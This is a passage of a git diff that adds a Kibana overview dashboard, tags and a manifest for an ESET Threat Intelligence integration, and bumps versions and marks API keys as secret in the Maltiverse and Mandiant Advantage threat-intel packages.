"{\"d17f1bba-6fab-4946-a506-1b42af88c9f3\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d17f1bba-6fab-4946-a506-1b42af88c9f3\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"searchTechnique\":\"prefix\",\"exclude\":false,\"enhancements\":{}}},\"2af8943a-8342-462e-be9a-c50fb0418796\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"large\",\"explicitInput\":{\"id\":\"2af8943a-8342-462e-be9a-c50fb0418796\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator type\",\"grow\":true,\"width\":\"large\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}}}" + }, + "description": "Overview dashboard", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "logs-*", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.ip", + "ti_eset.url", + "ti_eset.apt" + ], + "type": "phrases", + "value": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.ip", + "ti_eset.url", + "ti_eset.apt" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "ti_eset.botnet" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.cc" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.domains" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.files" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.ip" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.url" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.apt" + } + } + ] + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- **[Overview (This page)](/app/dashboards#/view/f608e350-8192-11ee-a704-a3364df0a052)**\n- [Domains, URL, IP](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)\n- [Files](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)\n- [Other indicators](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)\n\nThis overview dashboard displays overall health of the indicators .\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 20, + "i": "12ef4ff0-73cb-4d95-b80c-dc7c359536b0", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "12ef4ff0-73cb-4d95-b80c-dc7c359536b0", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1868c04a-6800-40dd-823d-e98338bce34d": { + "columnOrder": [ + "e1d22239-a0a9-473e-830f-641833926a58", + "5694cc0b-49d8-402b-9e86-4925f48c3eca" + ], + "columns": { + "5694cc0b-49d8-402b-9e86-4925f48c3eca": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "e1d22239-a0a9-473e-830f-641833926a58": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5694cc0b-49d8-402b-9e86-4925f48c3eca", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1868c04a-6800-40dd-823d-e98338bce34d", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "large", + "metrics": [ + "5694cc0b-49d8-402b-9e86-4925f48c3eca" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "e1d22239-a0a9-473e-830f-641833926a58" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "1d821e2b-cbfd-4dae-842a-027900f8bb90", + "w": 12, + "x": 8, + "y": 0 + }, + "panelIndex": "1d821e2b-cbfd-4dae-842a-027900f8bb90", + "title": "Total indicators by confidence", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7157ad3-4c27-4258-9277-bfb6584d2722": { + "columnOrder": [ + "332d5791-841c-4042-ba39-5d54958efb7e" + ], + "columns": { + "332d5791-841c-4042-ba39-5d54958efb7e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "eset.valid_until \u003e= now" + }, + "isBucketed": false, + "label": "Total valid indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "332d5791-841c-4042-ba39-5d54958efb7e", + "layerId": "f7157ad3-4c27-4258-9277-bfb6584d2722", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "8d48bfca-9525-437d-bd0a-e0e2e4505e43", + "w": 14, + "x": 20, + "y": 0 + }, + "panelIndex": "8d48bfca-9525-437d-bd0a-e0e2e4505e43", + "title": "Total valid indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7157ad3-4c27-4258-9277-bfb6584d2722": { + "columnOrder": [ + "332d5791-841c-4042-ba39-5d54958efb7e" + ], + "columns": { + "332d5791-841c-4042-ba39-5d54958efb7e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "eset.valid_until \u003c now" + }, + "isBucketed": false, + "label": "Total expired indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "332d5791-841c-4042-ba39-5d54958efb7e", + "layerId": "f7157ad3-4c27-4258-9277-bfb6584d2722", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "ae75a79d-2f96-4b59-a16b-4e9b808b6e88", + "w": 14, + "x": 34, + "y": 0 + }, + "panelIndex": "ae75a79d-2f96-4b59-a16b-4e9b808b6e88", + "title": "Total outdated indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "64456774-43b8-4d8f-9a5c-9b5319376d4e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1868c04a-6800-40dd-823d-e98338bce34d": { + "columnOrder": [ + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6", + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "columns": { + "44a7904b-22db-46e7-b45b-9ff5fe9b632c": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "44a7904b-22db-46e7-b45b-9ff5fe9b632c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "64456774-43b8-4d8f-9a5c-9b5319376d4e", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "logs-*", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.url", + "ti_eset.apt" + ], + "type": "phrases", + "value": [ + "ti_eset.botnet", + "ti_eset.cc", + "ti_eset.domains", + "ti_eset.files", + "ti_eset.url", + "ti_eset.apt" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "ti_eset.botnet" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.cc" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.domains" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.files" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.url" + } + }, + { + "match_phrase": { + "data_stream.dataset": "ti_eset.apt" + } + } + ] + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "layerId": "1868c04a-6800-40dd-823d-e98338bce34d", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "xAccessor": "9977775d-6e5a-4cfa-a036-bd7cba7de7a6" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "80c3c330-8693-4eae-9036-6aea2cbe0d9a", + "w": 28, + "x": 20, + "y": 6 + }, + "panelIndex": "80c3c330-8693-4eae-9036-6aea2cbe0d9a", + "title": "Total indicators per feed", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f0a5b3e6-b768-4abb-9ff5-66cadc9942cc", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f0a5b3e6-b768-4abb-9ff5-66cadc9942cc": { + "columnOrder": [ + "15573c0f-2580-4376-89e4-79e6500793c4", + "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b" + ], + "columns": { + "15573c0f-2580-4376-89e4-79e6500793c4": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "f0a5b3e6-b768-4abb-9ff5-66cadc9942cc", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "large", + "metrics": [ + "16358bb1-d5ec-4074-b4d9-ad2f0f69a91b" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "15573c0f-2580-4376-89e4-79e6500793c4" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "94c720b4-1aa4-4dd6-b9fc-05e1757ece34", + "w": 12, + "x": 8, + "y": 10 + }, + "panelIndex": "94c720b4-1aa4-4dd6-b9fc-05e1757ece34", + "title": "Indicators distribution per type", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1868c04a-6800-40dd-823d-e98338bce34d": { + "columnOrder": [ + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6", + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "columns": { + "44a7904b-22db-46e7-b45b-9ff5fe9b632c": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "error.message : * " + }, + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "5943c5c2-3afc-4a16-b518-0e1344c3b8f8": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "44a7904b-22db-46e7-b45b-9ff5fe9b632c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "9977775d-6e5a-4cfa-a036-bd7cba7de7a6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "44a7904b-22db-46e7-b45b-9ff5fe9b632c" + ], + "layerId": "1868c04a-6800-40dd-823d-e98338bce34d", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "5943c5c2-3afc-4a16-b518-0e1344c3b8f8", + "xAccessor": "9977775d-6e5a-4cfa-a036-bd7cba7de7a6" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [ + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Open in Discover" + }, + "eventId": "1e679208-c884-4951-8a23-18232324b255", + "triggers": [ + "FILTER_TRIGGER" + ] + } + ] + } + }, + "hidePanelTitles": false + }, + "gridData": { + "h": 11, + "i": "9911bc43-dc3b-4f43-acaf-839c7733ca4b", + "w": 40, + "x": 8, + "y": 20 + }, + "panelIndex": "9911bc43-dc3b-4f43-acaf-839c7733ca4b", + "title": "Total ingest pipeline errors", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Overview ", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:24:48.387Z", + "id": "ti_eset-f608e350-8192-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1d821e2b-cbfd-4dae-842a-027900f8bb90:indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d48bfca-9525-437d-bd0a-e0e2e4505e43:indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae75a79d-2f96-4b59-a16b-4e9b808b6e88:indexpattern-datasource-layer-f7157ad3-4c27-4258-9277-bfb6584d2722", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80c3c330-8693-4eae-9036-6aea2cbe0d9a:indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80c3c330-8693-4eae-9036-6aea2cbe0d9a:64456774-43b8-4d8f-9a5c-9b5319376d4e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "94c720b4-1aa4-4dd6-b9fc-05e1757ece34:indexpattern-datasource-layer-f0a5b3e6-b768-4abb-9ff5-66cadc9942cc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9911bc43-dc3b-4f43-acaf-839c7733ca4b:indexpattern-datasource-layer-1868c04a-6800-40dd-823d-e98338bce34d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d17f1bba-6fab-4946-a506-1b42af88c9f3:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_2af8943a-8342-462e-be9a-c50fb0418796:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/tag/ti_eset-ed13a500-8192-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/tag/ti_eset-ed13a500-8192-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..5966e6f031c --- /dev/null +++ b/packages/ti_eset/kibana/tag/ti_eset-ed13a500-8192-11ee-a704-a3364df0a052.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#0A6A71", + "description": "", + "name": "ESET" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-19T19:19:47.379Z", + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "managed": true, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/tag/ti_eset-security-solution-default.json b/packages/ti_eset/kibana/tag/ti_eset-security-solution-default.json new file mode 100644 index 00000000000..516ee120b3c --- /dev/null +++ b/packages/ti_eset/kibana/tag/ti_eset-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#D36086", + "description": "", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-19T19:19:47.379Z", + "id": "ti_eset-security-solution-default", + "managed": true, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_eset/manifest.yml b/packages/ti_eset/manifest.yml new file mode 100644 index 00000000000..870fa245f8a --- /dev/null +++ b/packages/ti_eset/manifest.yml @@ -0,0 +1,56 @@ +format_version: 3.0.3 +name: ti_eset +title: "ESET Threat Intelligence" +version: 0.1.0 +description: "Ingest threat intelligence indicators from ESET Threat Intelligence with Elastic Agent." +type: integration +categories: + - security + - threat_intel +conditions: + kibana: + version: "^8.12.0" + elastic: + subscription: "basic" +screenshots: + - src: /img/overview.png + title: threat intelligence overview + size: 600x600 + type: image/png + - src: /img/files.png + title: threat intelligence files + size: 600x600 + type: image/png + - src: /img/url-ip.png + title: threat intelligence domains, URLs and IPs + size: 600x600 + type: image/png +icons: + - src: /img/eset-lozenge-color-rgb.svg + title: Sample logo + size: 96x96 + type: image/svg+xml +policy_templates: + - name: eset + title: ETI feeds (TAXII version 2) + description: Collect data from ETI feeds (TAXII version 2) + inputs: + - type: httpjson + title: ETI feeds (TAXII version 2) + description: Collect data from ETI feeds (TAXII version 2) + vars: + - name: username + type: text + title: ETI Username + required: true + show_user: true + - name: password + type: password + title: ETI Password + multi: false + required: true + secret: true + show_user: true +owner: + github: elastic/security-service-integrations + type: partner diff --git a/packages/ti_maltiverse/changelog.yml b/packages/ti_maltiverse/changelog.yml index b8557d628fe..15bce69d730 100644 --- a/packages/ti_maltiverse/changelog.yml +++ b/packages/ti_maltiverse/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/ti_maltiverse/data_stream/indicator/manifest.yml b/packages/ti_maltiverse/data_stream/indicator/manifest.yml index 3855b0de795..144e4e5682a 100644 --- a/packages/ti_maltiverse/data_stream/indicator/manifest.yml +++ b/packages/ti_maltiverse/data_stream/indicator/manifest.yml @@ -7,11 +7,12 @@ streams: description: Fetches thread intelligence feeds from Maltiverse API vars: - name: api_token - type: text + type: password title: API Token description: Maltiverse API Token multi: false required: true + secret: true - name: feed type: text title: Feed diff --git a/packages/ti_maltiverse/manifest.yml b/packages/ti_maltiverse/manifest.yml index 2f73501d487..fc69bb0799c 100644 --- a/packages/ti_maltiverse/manifest.yml +++ b/packages/ti_maltiverse/manifest.yml @@ -1,13 +1,13 @@ name: ti_maltiverse title: Maltiverse -version: "1.0.1" +version: "1.1.0" description: Ingest threat intelligence indicators from Maltiverse feeds with Elastic Agent type: integration -format_version: 3.0.0 +format_version: 3.0.2 categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 icons: - src: /img/logo-maltiverse.svg title: Maltiverse diff --git a/packages/ti_mandiant_advantage/changelog.yml b/packages/ti_mandiant_advantage/changelog.yml index a1f4300624d..239aec69d00 100644 --- a/packages/ti_mandiant_advantage/changelog.yml +++ b/packages/ti_mandiant_advantage/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Remove invalid field definition. + type: bugfix + link: https://github.com/elastic/integrations/pull/9309 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml index 0090bbfe7aa..b99f4c3fe77 100644 --- a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml +++ b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml @@ -1,5 +1,3 @@ -- external: ecs - name: cloud - external: ecs name: cloud.account.id dimension: true diff --git a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml index da0dc258fd6..08ef6712b76 100644 --- a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml +++ b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml @@ -13,6 +13,7 @@ streams: multi: false required: true show_user: true + secret: false - name: mati_api_key_secret type: password title: Threat Intelligence API Key Secret @@ -20,6 +21,7 @@ streams: multi: false required: true show_user: true + secret: true - name: interval type: text title: Interval diff --git a/packages/ti_mandiant_advantage/docs/README.md b/packages/ti_mandiant_advantage/docs/README.md index 0d0da3633c9..3e1267d9baf 100644 --- a/packages/ti_mandiant_advantage/docs/README.md +++ b/packages/ti_mandiant_advantage/docs/README.md @@ -167,7 +167,6 @@ An example event for `threat_intelligence` looks as following: | Field | Description | Type | |---|---|---| | @timestamp | Event timestamp. | date | -| cloud | Fields related to the cloud or infrastructure the events are coming from. | group | | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | | cloud.account.name | The cloud account name or alias used to identify different entities in a multi-tenant environment. Examples: AWS account name, Google Cloud ORG display name. | keyword | | cloud.availability_zone | Availability zone in which this host, resource, or service is located. | keyword | diff --git a/packages/ti_mandiant_advantage/manifest.yml b/packages/ti_mandiant_advantage/manifest.yml index c83c5f53736..fc5877734e3 100644 --- a/packages/ti_mandiant_advantage/manifest.yml +++ b/packages/ti_mandiant_advantage/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: ti_mandiant_advantage title: "Mandiant Advantage" -version: 1.0.1 +version: 1.1.1 source: license: "Elastic-2.0" description: "Collect Threat Intelligence from products within the Mandiant Advantage platform." @@ -11,7 +11,7 @@ categories: - security conditions: kibana: - version: "^8.6.2" + version: "^8.12.0" elastic: subscription: basic screenshots: diff --git a/packages/ti_misp/_dev/deploy/docker/files/config.yml 